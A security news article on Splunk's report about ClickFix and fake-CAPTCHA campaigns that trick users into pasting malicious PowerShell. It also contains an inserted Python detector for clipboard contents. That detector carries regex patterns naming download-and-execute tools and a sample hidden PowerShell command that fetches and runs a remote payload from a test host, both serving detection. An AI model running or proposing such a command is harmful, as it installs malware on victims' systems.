UPDATED 09:00 EST / JULY 08 2025

SECURITY

Splunk uncovers surge in social engineering through fake CAPTCHA attacks

A new report out today from big data company Splunk Inc. warns of a new trend in cybercrime: a surge in sophisticated social engineering campaigns that use fake CAPTCHA systems to deliver malware without relying on any traditional software vulnerabilities.

Dubbed “ClickFix” and “FakeCAPTCHA” attacks, these campaigns are designed to trick users into infecting their own systems by exploiting their familiarity with everyday verification systems while leveraging clipboard manipulation techniques to deliver malicious payloads. Clipboard manipulation is a technique where malicious code silently copies harmful commands or data to a user’s clipboard, tricking them into pasting and executing it without realizing the danger.

The technique was first observed in early 2024 and is now growing rapidly in 2025. The attacks evolved from basic scams to advanced techniques reportedly adopted by nation-state actors. Victims are lured to malicious websites, via phishing, malvertising or links on pirated software sites, where they are greeted with convincing replicas of Google LLC’s reCAPTCHA or Cloudflare Inc.’s CAPTCHA pages.

The fake pages then prompt users to click verification buttons that trigger hidden JavaScript, which silently copies PowerShell commands to the user’s clipboard.

The malicious code then instructs users to open the Windows Run dialog and paste the copied content, under the guise of performing an additional verification step. The commands then usually download and execute a second-stage payload using hidden PowerShell windows. This approach evades detection while installing credential-stealing malware or remote access trojans, such as Lumma Stealer, Redline or AsyncRAT.

What makes the attack so effective is its psychological precision. When a potential victim visits a malicious site, the interface feels familiar and trustworthy, the instructions are simple and the urgency is carefully manufactured. The deception hinges entirely on human behavior, not on exploiting a technical flaw.

To help defenders counter the threat, Splunk researchers have introduced two open-source tools: ClickGrab and PasteEater.

ClickGrab is a dual-mode analysis platform that uses Python and PowerShell to detect and dissect malicious websites deploying fake CAPTCHA systems. PasteEater offers real-time user protection by intercepting clipboard content before it’s executed.

In addition to the two new tools, Splunk has also published detection queries for its security platform to help organizations proactively monitor for FakeCAPTCHA activity.
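To make the clipboard-interception idea concrete, here is an added example, not code from Splunk, ClickGrab or PasteEater, that scores text about to be pasted into the Run dialog against the behaviour described above (PowerShell, hidden window, download and execute). The indicator patterns, verdict names and sample strings are assumptions constructed for illustration.

```python
import re

# Patterns are assumptions modelled on the behaviour the article describes
# (PowerShell, hidden window, download-and-execute); they are not Splunk's rules.
INDICATORS = {
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+(hidden|1)\b", re.I),
    "encoded_command": re.compile(
        r"(?<!\S)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                           r"downloadstring|downloadfile|curl|wget)\b", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def normalize(text):
    """Drop quotes/backticks and collapse whitespace so split tokens still match."""
    return re.sub(r"\s+", " ", re.sub(r"[`'\"]", "", text)).strip()

def classify(clipboard_text):
    """Return (verdict, hits) for text about to be pasted into the Run dialog."""
    hits = {name for name, rx in INDICATORS.items()
            if rx.search(normalize(clipboard_text))}
    fetches = {"download", "remote_url"} <= hits
    if "powershell" in hits and (fetches or hits & {"hidden_window", "encoded_command"}):
        verdict = "block"    # matches the paste-and-run chain described above
    elif fetches or {"powershell", "execute"} <= hits:
        verdict = "review"   # suspicious, but not the full pattern
    else:
        verdict = "allow"
    return verdict, sorted(hits)

# Constructed sample clipboard contents (example.invalid is a reserved test domain).
SAMPLES = [
    'powershell -w hidden -c "iwr https://cdn.example.invalid/verify.txt | iex"',
    "curl https://example.invalid/setup.sh",
    "https://example.com/docs/install",
    r"Get-ChildItem C:\Users -Recurse | Measure-Object",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, hits = classify(sample)
        print(f"{verdict:6} {hits} <- {sample[:60]}")
```

The same patterns can be run over command-line or Run-dialog history collected from endpoints; expect to tune them against legitimate administrator activity before alerting on the "review" tier.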

“ClickFix and FakeCAPTCHA campaigns represent a sophisticated evolution in social engineering attacks, blending technical deception with human psychology,” said Splunk’s researchers. “While they may seem simplistic compared to advanced exploit chains, their effectiveness lies in exploiting the most vulnerable component of any security system: human trust.”
